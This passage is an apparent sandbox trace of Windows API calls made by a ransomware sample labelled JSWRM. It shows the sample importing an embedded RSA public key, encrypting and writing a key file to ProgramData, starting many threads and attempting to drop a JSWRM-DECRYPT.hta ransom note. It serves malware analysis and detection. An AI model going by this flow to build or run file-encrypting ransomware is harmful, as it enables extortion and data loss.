pszString="BgIAAACkAABSU0ExABAAAAEAAQBpZrGSy1o5rPd2ZnK+T3kb7Kd/hpd3POG7b9gDp5F1AhYFkm8wvR3DUyLsrbcx4IQ7TvkaNbKAl89gZaC20mWDO0W5ZPIl0Xc3cykLa+uekrhjPf7SxnnhNcEZ7Mf/7DoPdNGBh1/E9NhfZJo+YtEPmZmKPcV11Y0ftdjWQYOix1ejyuOrmrWTMFj82XDvl9tO8eMAzLHO8UQEVnOHcPMO1nzBMaBCFWchBdpIMP4KF6hpGN97lBzPYbRewls6zJ9pAcaqnsaQSndI0EhL5OoPmqsR+3TmmXVKOCqICoG9Lg1hxFSgAsKz4cZ9iSZ3DzmmSrH88Ltk3EgmQB1z8Cyu2oDp14SAL+7Y3JIGWA2++7jkUVmQZmKdAKCVXHaVp3v04LXXBtBhXQxtays7vwnpEvOHS8FjL5clNzHdWpIoKQIX41ajjGH9YVL7puyK+izYPyn3HQz62QaEq8cbqExS00PmrwFX8/DfB4ODGiUQxLICsYyWenmrUqjOrMXSkNILqrrybY9NZqGiPwZ1FnkoZ+l/gArD30xPAw3f5rZg+uQdgdWQj9SVNrHjSD2ulCaWfKy5nVWdc/JBclXYrJyXBuZB9+DtXivY6X06pCoxrjVBJAIpj3RabnRXsBkqyvL4tG2JlLILsUozcDVR14weDWMWgsvPSu9d/rNUE2fHyg==", cchString=0x2c8, dwFlags=0x1, pbBinary=0x2194a0, pcbBinary=0xbcfa74, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2194a0, pcbBinary=0xbcfa74, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0057.073] CryptAcquireContextA (in: phProv=0xbcfa84, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0x0 | out: phProv=0xbcfa84*=0x225328) returned 1 [0057.888] CryptImportKey (in: hProv=0x225328, pbData=0x2194a0, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0xbcfa80 | out: phKey=0xbcfa80*=0x231f00) returned 1 [0057.889] CryptEncrypt (in: hKey=0x231f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0xbcfa88*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0xbcfa88*=0x200) returned 1 [0057.889] CryptEncrypt (in: hKey=0x231f00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1343568*, pdwDataLen=0xbcfa7c*=0x31, dwBufLen=0x200 | out: pbData=0x1343568*, pdwDataLen=0xbcfa7c*=0x200) returned 1 [0057.891] CryptBinaryToStringA (in: pbBinary=0x1343568, cbBinary=0x200, dwFlags=0x1, pszString=0x0, pcchString=0xbcfa70 | out: pszString=0x0, pcchString=0xbcfa70) returned 1 [0057.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c3) returned 0x22a8e8 [0057.891] CryptBinaryToStringA (in: pbBinary=0x1343568, cbBinary=0x200, dwFlags=0x1, pszString=0x22a8e8, pcchString=0xbcfa70 | out: pszString="cZ66ETKAHPqBe9RFX3ZEoSRKJ3ueM+ANT0EQYEFUrc9d8Ei/kBN0jeTsBV8xsh0T\r\nLyEiGW1rJZpJZlRZFbxaUDTiUX5SBQQ2nuWUQZNgFf1VV86J4AYlXWKbzz7IwnkS\r\ncgZ9zV6TBqbDVQ1hwj0f0Q5vcHTzX//gmdYdatnjHSnnqgequR/VuXdZ/rKs8NP2\r\naLlPrYmLLBPsM6xLGK2S9s+Fyi1w57uUMGExyeE1rrJYUSA1G9z0YLTx+6QUEbpL\r\nyEYwmfeek7ZhIov0mhmyjcmGdXCT7SzxLPPjaAJNtXEEEbOjJP96cVxEwp1Fi0LP\r\n8etgWPeMxktlwwNXxd7gDcJZ7sfmVzSVN6k/5l3ukeak/zRiCHpWtLUW9mQQ5imD\r\n+h3wRFRezdROA5Y3iREL5oXWwizZ8UrSbSIEw39jnPZ5bATlqiFCNQ/C58OSVH8x\r\nGDGwbkPfE6VyfT0PlL8JXLmyxhk+AKZwt1aNpMJSa5olhoccU2e0N6GFFD9XCdaw\r\nUxM01w7aqGFdsOmD4Zi6G+dx68OltX8xx4HmoN3M0EMoW2wTM9mYvkX32j9vXYeR\r\nsjtWAkp19WCUoPMx9NutjR6JEFydglNeXDGi0Lq7X4mVpQxoiq9j82IHIjOiEjC4\r\nvqmrWEL5gAxF8q4fmP5MRJipIrX1wEsp7380WChv3yc=\r\n", pcchString=0xbcfa70) returned 1 [0057.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0057.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a678 [0057.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a678, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0057.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a678 | out: hHeap=0x1e0000) returned 1 [0057.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0057.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232e20 [0057.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0057.891] CreateFileW (lpFileName="C:\\ProgramData\\key.9A8I36E.JSWRM" (normalized: "c:\\programdata\\key.9a8i36e.jswrm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0057.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0057.892] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0057.892] WriteFile (in: hFile=0x298, lpBuffer=0x22a8e8*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0xbcfa78, lpOverlapped=0x0 | out: lpBuffer=0x22a8e8*, lpNumberOfBytesWritten=0xbcfa78*=0x2c2, lpOverlapped=0x0) returned 1 [0057.893] CloseHandle (hObject=0x298) returned 1 [0057.895] CryptReleaseContext (hProv=0x225328, dwFlags=0x0) returned 1 [0057.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0057.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a6a8 [0057.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229340 [0057.895] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22934c | out: phModule=0x22934c*=0x1320000) returned 1 [0057.895] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229340, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xe00) returned 0x298 [0057.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a4f8 [0057.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229000 [0057.896] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22900c | out: phModule=0x22900c*=0x1320000) returned 1 [0057.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229000, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xdf0) returned 0x3d4 [0057.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a750 [0057.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229260 [0057.896] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22926c | out: phModule=0x22926c*=0x1320000) returned 1 [0057.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229260, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xfb0) returned 0x3e4 [0057.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a558 [0057.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2290a0 [0057.897] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2290ac | out: phModule=0x2290ac*=0x1320000) returned 1 [0057.897] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2290a0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xfc0) returned 0x3e8 [0057.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a4c8 [0057.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229280 [0057.898] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22928c | out: phModule=0x22928c*=0x1320000) returned 1 [0057.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229280, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x8ac) returned 0x3ec [0057.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a570 [0057.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2290c0 [0057.898] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2290cc | out: phModule=0x2290cc*=0x1320000) returned 1 [0057.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2290c0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x8f0) returned 0x3f0 [0057.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a678 [0057.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229180 [0057.899] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22918c | out: phModule=0x22918c*=0x1320000) returned 1 [0057.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229180, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xd2c) returned 0x3f4 [0057.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a600 [0057.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229360 [0057.900] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22936c | out: phModule=0x22936c*=0x1320000) returned 1 [0057.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229360, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xce8) returned 0x3f8 [0057.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a4e0 [0057.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2291a0 [0057.901] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2291ac | out: phModule=0x2291ac*=0x1320000) returned 1 [0057.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2291a0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x2ac) returned 0x3fc [0057.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a588 [0057.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2292a0 [0057.901] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2292ac | out: phModule=0x2292ac*=0x1320000) returned 1 [0057.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2292a0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x7a4) returned 0x404 [0057.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a690 [0057.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229300 [0057.902] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22930c | out: phModule=0x22930c*=0x1320000) returned 1 [0057.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229300, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xd04) returned 0x408 [0057.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a5d0 [0057.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x228fc0 [0057.906] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x228fcc | out: phModule=0x228fcc*=0x1320000) returned 1 [0057.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x228fc0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x58) returned 0x40c [0057.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a510 [0057.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229380 [0057.907] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22938c | out: phModule=0x22938c*=0x1320000) returned 1 [0057.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229380, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xd34) returned 0x410 [0057.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a5a0 [0057.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x228fa0 [0057.908] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x228fac | out: phModule=0x228fac*=0x1320000) returned 1 [0057.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x228fa0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xac8) returned 0x414 [0057.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a618 [0057.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229680 [0057.908] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22968c | out: phModule=0x22968c*=0x1320000) returned 1 [0057.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229680, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0xe98) returned 0x418 [0057.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a630 [0057.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2296e0 [0057.909] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2296ec | out: phModule=0x2296ec*=0x1320000) returned 1 [0057.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2296e0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x7ec) returned 0x41c [0057.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a648 [0057.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x229400 [0057.910] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x22940c | out: phModule=0x22940c*=0x1320000) returned 1 [0057.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x229400, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1004) returned 0x420 [0057.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a840 [0057.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x2294c0 [0057.911] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2294cc | out: phModule=0x2294cc*=0x1320000) returned 1 [0057.911] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x2294c0, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1008) returned 0x424 [0057.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a978 [0057.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219ef8 [0057.912] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x219f04 | out: phModule=0x219f04*=0x1320000) returned 1 [0057.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219ef8, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x100c) returned 0x428 [0057.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a948 [0057.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219cf8 [0057.912] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x219d04 | out: phModule=0x219d04*=0x1320000) returned 1 [0057.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219cf8, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1010) returned 0x42c [0057.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a870 [0057.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219d78 [0057.913] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x219d84 | out: phModule=0x219d84*=0x1320000) returned 1 [0057.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219d78, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1014) returned 0x430 [0057.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a900 [0057.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219d98 [0057.914] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x219da4 | out: phModule=0x219da4*=0x1320000) returned 1 [0057.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219d98, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1018) returned 0x434 [0057.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a8b8 [0057.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219db8 [0057.915] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x219dc4 | out: phModule=0x219dc4*=0x1320000) returned 1 [0057.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219db8, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x101c) returned 0x438 [0057.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a810 [0057.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x219998 [0057.916] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x2199a4 | out: phModule=0x2199a4*=0x1320000) returned 1 [0057.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x219998, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1020) returned 0x43c [0057.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a8d0 [0057.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x1f6078 [0057.916] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x1f6084 | out: phModule=0x1f6084*=0x1320000) returned 1 [0057.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x1f6078, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1024) returned 0x440 [0057.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc) returned 0x23a8e8 [0057.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x1f6198 [0057.917] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1331900, phModule=0x1f61a4 | out: phModule=0x1f61a4*=0x1320000) returned 1 [0057.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1336962, lpParameter=0x1f6198, dwCreationFlags=0x0, lpThreadId=0xbcf9c0 | out: lpThreadId=0xbcf9c0*=0x1028) returned 0x444 [0057.918] GetCurrentThreadId () returned 0xd54 [0057.918] WaitForSingleObjectEx (hHandle=0x298, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0058.550] GetExitCodeThread (in: hThread=0x298, lpExitCode=0xbcfa08 | out: lpExitCode=0xbcfa08) returned 1 [0058.550] CloseHandle (hObject=0x298) returned 1 [0058.550] GetCurrentThreadId () returned 0xd54 [0058.550] WaitForSingleObjectEx (hHandle=0x3d4, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0058.550] GetExitCodeThread (in: hThread=0x3d4, lpExitCode=0xbcfa08 | out: lpExitCode=0xbcfa08) returned 1 [0058.551] CloseHandle (hObject=0x3d4) returned 1 [0058.551] GetCurrentThreadId () returned 0xd54 [0058.551] WaitForSingleObjectEx (hHandle=0x3e4, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 2 os_tid = 0xd18 Thread: id = 3 os_tid = 0xea0 Thread: id = 4 os_tid = 0xf94 Thread: id = 5 os_tid = 0xf90 Thread: id = 6 os_tid = 0xf7c Thread: id = 7 os_tid = 0xff4 Thread: id = 8 os_tid = 0x174 Thread: id = 76 os_tid = 0xe00 [0058.121] GetLastError () returned 0x57 [0058.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21abb8 [0058.121] SetLastError (dwErrCode=0x57) [0058.121] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x75ba0000 [0058.122] GetProcAddress (hModule=0x75ba0000, lpProcName="AppPolicyGetThreadInitializationType") returned 0x75ba3210 [0058.122] AppPolicyGetThreadInitializationType () returned 0x0 [0058.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.128] GetFileAttributesW (lpFileName="A:\\JSWRM-DECRYPT.hta" (normalized: "a:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x31dc748, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.133] CreateFileW (lpFileName="A:\\JSWRM-DECRYPT.hta" (normalized: "a:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.133] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.133] WriteFile (in: hFile=0xffffffff, lpBuffer=0x31dc85c, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x31dc828, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31dc828, lpOverlapped=0x0) returned 0 [0058.133] CloseHandle (hObject=0xffffffff) returned 1 [0058.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.133] FindFirstFileW (in: lpFileName="A:\\*.*", lpFindFileData=0x31df8e4 | out: lpFindFileData=0x31df8e4*(dwFileAttributes=0x31df9a8, ftCreationTime.dwLowDateTime=0x31dfb00, ftCreationTime.dwHighDateTime=0xc0000225, ftLastAccessTime.dwLowDateTime=0x31df924, ftLastAccessTime.dwHighDateTime=0x31df924, ftLastWriteTime.dwLowDateTime=0x31e0000, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xc, nFileSizeLow=0xc, dwReserved0=0x1f0b28, dwReserved1=0x31df8d8, cFileName="", cAlternateFileName="\x3ef8\x132")) returned 0xffffffff [0058.133] GetCurrentThreadId () returned 0xe00 [0058.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a6a8 | out: hHeap=0x1e0000) returned 1 [0058.133] GetLastError () returned 0x3 [0058.134] SetLastError (dwErrCode=0x3) [0058.134] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229340 | out: hHeap=0x1e0000) returned 1 [0058.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21abb8 | out: hHeap=0x1e0000) returned 1 Thread: id = 77 os_tid = 0xdf0 [0058.135] GetLastError () returned 0x57 [0058.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21abb8 [0058.135] SetLastError (dwErrCode=0x57) [0058.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 